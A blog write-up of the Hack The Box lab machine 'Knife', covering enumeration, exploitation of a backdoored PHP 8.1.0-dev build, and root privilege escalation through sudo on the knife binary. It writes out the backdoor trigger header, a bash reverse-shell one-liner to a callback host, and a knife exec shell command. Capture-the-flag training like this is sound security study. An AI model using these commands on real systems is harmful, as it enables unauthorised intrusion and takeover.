2 minute read Leia também em :brazil: Share

Hello guys!

This week’s machine will be Knife, another easy-rated Linux box from Hack The Box, created by MrKN16H.

:information_source: Info: Write-ups for Hack The Box machines are posted as soon as they’re retired.

HTB Knife

This was a pretty straightforward box where you must pay attention to the details (in the case of the vulnerable web server) and always go for the low-hanging fruits first like abusing the sudo permissions user already have.

I hope you guys enjoy it!

Enumeration

As usual, started with a quick nmap scan to check the published services on this box:

$ nmap -sC -sV -Pn -oA quick 10.10.10.242
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-10 17:50 -03
Nmap scan report for 10.10.10.242
Host is up (0.072s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.42 seconds

80/TCP - HTTP Service

Accessing the website we can see a simple institutional page from a health company, as below:

HTB Knife - HTTP Service

After accessing the website, gathered some information about the page, its components, and the server from which it was published using whatweb, and what called attention was the X-Powered-By header pointing to a dev version of PHP 8.1.0.

$ whatweb --color=never -a 3 10.10.10.242 | tee whatweb.txt
http://10.10.10.242 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.242], PHP[8.1.0-dev], , Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]

Initial Access and User flag

As dev versions often contain vulnerabilities, decided to search it using searchsploit and found an RCE vulnerability as listed below:

$ searchsploit "8.1.0-dev"
---------------------------------------------------------------------- ----------------------------
 Exploit Title                                                        |  Path
---------------------------------------------------------------------- ----------------------------
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution                   | php/webapps/49933.py
---------------------------------------------------------------------- ----------------------------
Shellcodes: No Results

This vulnerability consists in a backdor which was added in some commits of PHP source code by compromised accounts and, when a request arrives with a header User-Agentt: "zerodiumsystem('cmd');", the cmd will be interpreted and executed in the system. The payload available emulate a non-interactive shell and, from it, started an interactive session using the payload bash -c 'bash -i >& /dev/tcp/10.10.10.10/4443 0>&1' which returned a session from james’s user account, where in his home directory I was able to read the contents of user.txt, obtaining the first flag.

james@knife:~$ id && hostname
uid=1000(james) gid=1000(james) groups=1000(james)
knife
james@knife:~$ cat user.txt
<redacted>

Root flag

As usual, started with the command sudo -l and we were lucky once again, as output below:

james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
   env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
   (root) NOPASSWD: /usr/bin/knife              

Doing a quick search on this binary, found out that it’s related to Chef’s Configuration Management Solution and, according to knife | GTFOBins page, could be easily used to privesc to root, as below, allowing us to get the final flag :smiley:

james@knife:~$ sudo /usr/bin/knife --help                                                                                 Chef Infra Client: 16.10.8

Docs: https://docs.chef.io/workstation/knife/
Patents: https://www.chef.io/patents

[...]

james@knife:~$ sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
# cat root.txt
<redacted>

I hope you guys have enjoyed!

See you at the next post :smile: